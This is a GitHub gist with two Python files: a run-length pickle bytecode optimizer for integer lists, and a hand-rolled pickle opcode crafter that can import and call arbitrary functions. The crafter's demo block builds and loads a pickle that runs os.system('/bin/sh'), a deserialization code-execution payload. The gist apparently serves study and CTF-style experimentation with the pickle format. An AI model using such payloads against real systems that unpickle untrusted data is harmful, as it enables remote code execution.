Last active
February 29, 2024 12:52
-
-
Save Xornet-Euphoria/0691ebe626ed1f6dfcc24884fde59e41 to your computer and use it in GitHub Desktop.
Pickle bytecode optimization (with my own script for crafting payload)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import pickle | |
import pickletools | |
import payload_crafter | |
class RunLengthCrafter(payload_crafter.Crafter):
    """Crafter that emits run-length style payloads for lists of integers.

    A run ``(x, length)`` is encoded as the call
    ``getattr([x], "__mul__")(length)``, i.e. ``[x] * length``, and several
    runs are concatenated with ``sum([run2, run3, ...], run1)``.

    The methods below use hard-coded memo indices (0 and 1), so they assume
    the unpickler's memo is empty when the first run is emitted.
    """

    def __init__(self, *, check_stop=False) -> None:
        super().__init__(check_stop=check_stop)

    def create_single_element_list(self, x, length):
        """Emit opcodes that evaluate to ``[x] * length``.

        ``x`` and ``length`` are written with ``push_int`` and are therefore
        limited to what that method supports. Returns ``self`` for chaining.
        """
        self.import_from("builtins", "getattr", use_stack=False)
        self._single_element_list_internal(x, length, is_first=True)
        return self

    def _single_element_list_internal(self, x, length, memo_idx=0, is_first=False):
        """Emit ``<callable>([x], "__mul__")(length)``.

        The callable (``getattr``) must already be on the stack. When
        ``is_first`` is true the ``"__mul__"`` string is pushed and memoized;
        otherwise it is fetched from memo slot ``memo_idx``.
        """
        # Build the one-element list [x].
        self.add_payload(pickle.EMPTY_LIST)
        self.push_int(x)
        self.add_payload(pickle.APPEND)
        if is_first:
            self.push_str("__mul__")
            self.memoize()
        else:
            self.get_memo(memo_idx)
        # getattr([x], "__mul__") -> bound method
        self.call_f(2)
        # bound_method(length) -> [x] * length
        self.push_int(length)
        self.call_f(1)
        return self

    def create_run_length_single_element_list(self, x, length, memo_idx=0, is_first=False):
        """Emit ``[x] * length`` while sharing ``getattr`` and ``"__mul__"`` via the memo.

        With ``is_first=True`` both objects are emitted and memoized (slots 0
        and 1 when the memo was empty). Otherwise ``getattr`` is read from
        ``memo_idx`` and ``"__mul__"`` from slot 1.
        """
        if is_first:
            self.import_from("builtins", "getattr", use_stack=False)
            self.memoize()  # idx will be 0
        else:
            self.get_memo(memo_idx)
        return self._single_element_list_internal(x, length, memo_idx=1, is_first=is_first)

    # sum([l2, l3, ...], l1)
    # -> l1 + l2 + l3 + ...
    def run_length(self, t):
        """Emit a complete, STOP-terminated payload for the runs in ``t``.

        ``t`` is a sequence of ``(value, length)`` pairs. Unpickling the
        payload yields the concatenation of ``[value] * length`` for every
        pair, in order. Returns ``self`` for chaining.
        """
        runs = list(t)

        if not runs:
            # No runs at all: the decoded result is simply an empty list.
            self.add_payload(pickle.EMPTY_LIST)
            self.stop()
            return self

        if len(runs) == 1:
            # A single run needs neither sum() nor the shared memo entries.
            # (Previously this case read memo slot 0 before anything had been
            # memoized, producing a payload that could not be loaded.)
            x, length = runs[0]
            self.create_single_element_list(x, length)
            self.stop()
            return self

        self.import_from("builtins", "sum", use_stack=False)

        # if len(t) < 4 then using pickle.TUPLE<n> is more optimized than pickle.MARK and pickle.LIST
        # note: sum([l2, l3, l4], l1) == sum((l2, l3, l4), l1)
        self.add_payload(pickle.MARK)
        for i, (x, length) in enumerate(runs[1:]):
            # The first emitted run is the one that populates the memo.
            self.create_run_length_single_element_list(x, length, is_first=(i == 0))
        self.add_payload(pickle.LIST)

        # The first run is the start value of sum(), so it is emitted last.
        x, length = runs[0]
        self.create_run_length_single_element_list(x, length)

        self.call_f(2)
        self.stop()
        return self
def search_boundary_list(max_length=256):
    """Find the shortest ``[1] * n`` whose crafted payload beats ``pickle.dumps``.

    Tries ``n = 1 .. max_length - 1``. For each ``n`` the crafted payload is
    checked to unpickle to the same list as the standard pickle. On the first
    ``n`` where the crafted payload is strictly shorter, the sizes are printed
    and ``n`` is returned. Returns ``None`` when no such ``n`` is found.
    """
    for i in range(1, max_length):
        target = [1] * i
        org_p = pickle.dumps(target)

        crafter = RunLengthCrafter()
        optimized_p = crafter.create_single_element_list(1, i).get_payload(check_stop=True)

        # Sanity check: both byte strings must decode to the same list.
        assert pickle.loads(org_p) == pickle.loads(optimized_p)

        opt_len = len(optimized_p)
        org_len = len(org_p)
        if opt_len < org_len:
            print(f"boundary length: {i}")
            print(f"- org: {org_len}")
            print(f"- opt: {opt_len}")
            return i
    return None
def test_run_length():
    """Check that a run-length payload round-trips and is shorter than ``pickle.dumps``.

    Builds a list made of three runs, crafts the payload, disassembles it
    for inspection, prints its size and asserts both correctness and the
    size advantage.
    """
    from itertools import groupby

    crafter = RunLengthCrafter()
    expected = [0] * 0x40 + [1] * 0x20 + [2] * 0x10
    runs = [(value, len(list(group))) for value, group in groupby(expected)]

    crafter.run_length(runs)
    res = crafter.loads()

    payload = crafter.get_payload(check_stop=True)
    pickletools.dis(payload)

    # run_length() already appends STOP, so the payload length is the full
    # size; adding one more byte would count the terminator twice.
    size = len(payload)
    print(size)

    assert res == expected
    assert size < len(pickle.dumps(expected))
def test():
    """Run the boundary search, print a separator line, then run the run-length check."""
    separator = "=" * 40
    search_boundary_list()
    print(separator)
    test_run_length()
# Script entry point: run the self-checks only when executed directly,
# not when this module is imported.
if __name__ == "__main__":
    test()
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import pickle | |
class Crafter:
    """Assemble a pickle byte stream by hand, one opcode at a time.

    The bytes built so far are kept in ``self.payload``. The helper methods
    append opcodes and their operands; nothing is validated against the
    pickle virtual machine until the payload is actually loaded.
    """

    # Opcodes that build a tuple of 0..3 items without requiring a MARK.
    _SMALL_TUPLE_OPCODES = (
        pickle.EMPTY_TUPLE,
        pickle.TUPLE1,
        pickle.TUPLE2,
        pickle.TUPLE3,
    )

    def __init__(self, *, check_stop=False) -> None:
        self.payload = b""
        self.check_stop = check_stop  # reserved and not implemented yet
        # Offset of the STOP opcode written by stop(), or -1 if none was
        # written. Tracked explicitly because a trailing b"." may just as
        # well be an operand byte (e.g. BININT1 46).
        self._stop_index = -1

    # Merely a wrapper around `self.payload += b`, but meant to be
    # overridable, e.g. to trace the emitted bytes while debugging.
    def add_payload(self, b: bytes):
        """Append raw bytes to the payload."""
        self.payload += b

    def push_int(self, n: int):
        """Push the non-negative integer ``n`` using the shortest fixed-width opcode.

        Supports ``0 <= n < 2**31`` (BININT1, BININT2 or BININT).

        Raises:
            NotImplementedError: if ``n`` is negative or does not fit in
                a signed 4-byte integer.
        """
        if n < 0:
            raise NotImplementedError("positive only")

        if n < 0x100:
            self._push_int1(n)
            return

        if n < 0x10000:
            self._push_int2(n)
            return

        # BININT carries a signed 4-byte operand, hence the 2**31 bound.
        if n < 0x80000000:
            self._push_int4(n)
            return

        raise NotImplementedError("integers below 2**31 only")

    def _push_int1(self, n: int):
        self.add_payload(pickle.BININT1)
        self._add_number1(n)

    def _push_int2(self, n: int):
        self.add_payload(pickle.BININT2)
        self._add_number2(n)

    def _push_int4(self, n: int):
        self.add_payload(pickle.BININT)
        self._add_number4(n)

    def push_str(self, s: str):
        """Push the string ``s``.

        ASCII strings use SHORT_BINSTRING / BINSTRING. Strings with non-ASCII
        characters use SHORT_BINUNICODE / BINUNICODE so that they load with
        ``pickle.loads`` defaults. The length operand is always the number of
        encoded bytes, not the number of characters.

        Raises:
            ValueError: if the encoded string needs more than 4 length bytes.
        """
        data = s.encode()
        length = len(data)
        if length >= 2**32:
            raise ValueError("string too long for a 4-byte length field")

        if s.isascii():
            short_op, long_op = pickle.SHORT_BINSTRING, pickle.BINSTRING
        else:
            short_op, long_op = pickle.SHORT_BINUNICODE, pickle.BINUNICODE

        if length < 0x100:
            self.add_payload(short_op)
            self._add_number1(length)
        else:
            self.add_payload(long_op)
            self._add_number4(length)
        self.add_payload(data)

    # utils about list, tuple and dict
    def to_tuple(self, cnt: int = 0, use_mark: bool = False):
        """Emit the opcode that packs the top stack items into a tuple.

        For ``cnt`` in 0..3 (and ``use_mark`` false) the dedicated fixed-size
        opcode is used. Otherwise the generic TUPLE opcode is emitted, which
        relies on a MARK having been emitted before the items; that is not
        checked here.
        """
        if cnt in range(0, 4) and not use_mark:
            self.add_payload(self._SMALL_TUPLE_OPCODES[cnt])
        else:
            # todo: check whether MARK(@) is used in the payload
            self.add_payload(pickle.TUPLE)

    # utils about objects that is not pickle-native (import, function and etc)
    def import_from(self, module: str, name: str, *, use_stack=True):
        """Push the object ``module.name``.

        With ``use_stack`` true both names are pushed as strings followed by
        STACK_GLOBAL; otherwise the text-based GLOBAL opcode is used.
        """
        if use_stack:
            self.push_str(module)
            self.push_str(name)
            self.add_payload(pickle.STACK_GLOBAL)
        else:
            # shorter than STACK_GLOBAL
            # if other optimization techniques are used (for example, memoize frequently used strings)
            # this method may not be effective
            self.add_payload(pickle.GLOBAL)
            self.add_payload(module.encode("utf-8"))
            self._add_newline()
            self.add_payload(name.encode("utf-8"))
            self._add_newline()

    def call_f(self, argc: int = 0, use_mark=False):
        """Pack ``argc`` arguments into a tuple and emit REDUCE to call the callable below them."""
        self.to_tuple(argc, use_mark=use_mark)
        self.reduce()

    def reduce(self):
        """Emit REDUCE."""
        self.add_payload(pickle.REDUCE)

    def stop(self):
        """Emit STOP and remember where it was written."""
        self.add_payload(pickle.STOP)
        self._stop_index = len(self.payload) - 1

    # utils about memo
    # todo: emulate memo and estimate index in memoize
    # todo: put_memo
    def memoize(self):
        """Emit MEMOIZE; the memo index it receives is not tracked here."""
        self.add_payload(pickle.MEMOIZE)

    def get_memo(self, idx: int):
        """Push memo entry ``idx`` (BINGET below 0x100, text GET otherwise)."""
        if idx < 0x100:
            self.add_payload(pickle.BINGET)
            self._add_number1(idx)
            return

        # todo: pickle.LONGBINGET
        self.add_payload(pickle.GET)
        self._add_number(idx)
        self._add_newline()

    # interfaces about payload
    def _ends_with_stop(self) -> bool:
        """Return whether the last payload byte is a STOP written by ``stop()``."""
        return self._stop_index >= 0 and self._stop_index == len(self.payload) - 1

    def get_payload(self, check_stop=False) -> bytes:
        """Return the payload bytes.

        With ``check_stop`` true, a STOP opcode is appended first unless the
        payload already ends with one written by ``stop()``. An empty payload
        is handled, and a trailing operand byte that merely equals ``b"."``
        is not mistaken for STOP.
        """
        if check_stop and not self._ends_with_stop():
            self.stop()

        return self.payload

    def get_length(self, with_stop: bool = False) -> int:
        """Return the payload length, plus one when ``with_stop`` is true."""
        l = len(self.payload)
        return l + 1 if with_stop else l

    def loads(self, check_stop=False):
        """Unpickle the crafted payload and return the result.

        NOTE: this executes whatever the payload encodes, including calls to
        arbitrary importable callables.
        """
        _payload = self.get_payload(check_stop)
        res = pickle.loads(_payload)

        return res

    def clear(self):
        """Reset the payload to empty."""
        self.payload = b""
        self._stop_index = -1

    # utils for internal
    def _add_newline(self):
        self.add_payload(b"\n")

    def _add_number(self, n: int):
        # decimal text form, as used by the text-based opcodes
        self.add_payload(str(n).encode())

    def _add_number1(self, n: int):
        self._add_number_to_bytes(n, 1)

    def _add_number2(self, n: int):
        self._add_number_to_bytes(n, 2)

    def _add_number4(self, n: int):
        self._add_number_to_bytes(n, 4)

    def _add_number_to_bytes(self, n: int, length: int):
        # fixed-width little-endian operand
        self.add_payload(n.to_bytes(length, "little"))
if __name__ == "__main__":
    # Demo: craft a payload equivalent to os.system("/bin/sh") and load it.
    # WARNING: running this module as a script therefore spawns a shell.
    demo = Crafter()
    demo.import_from("os", "system", use_stack=False)
    demo.push_str("/bin/sh")
    demo.call_f(1)

    demo_bytes = demo.get_payload(check_stop=True)
    print(len(demo_bytes))

    # The printed value is whatever os.system returned.
    print(pickle.loads(demo_bytes))
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment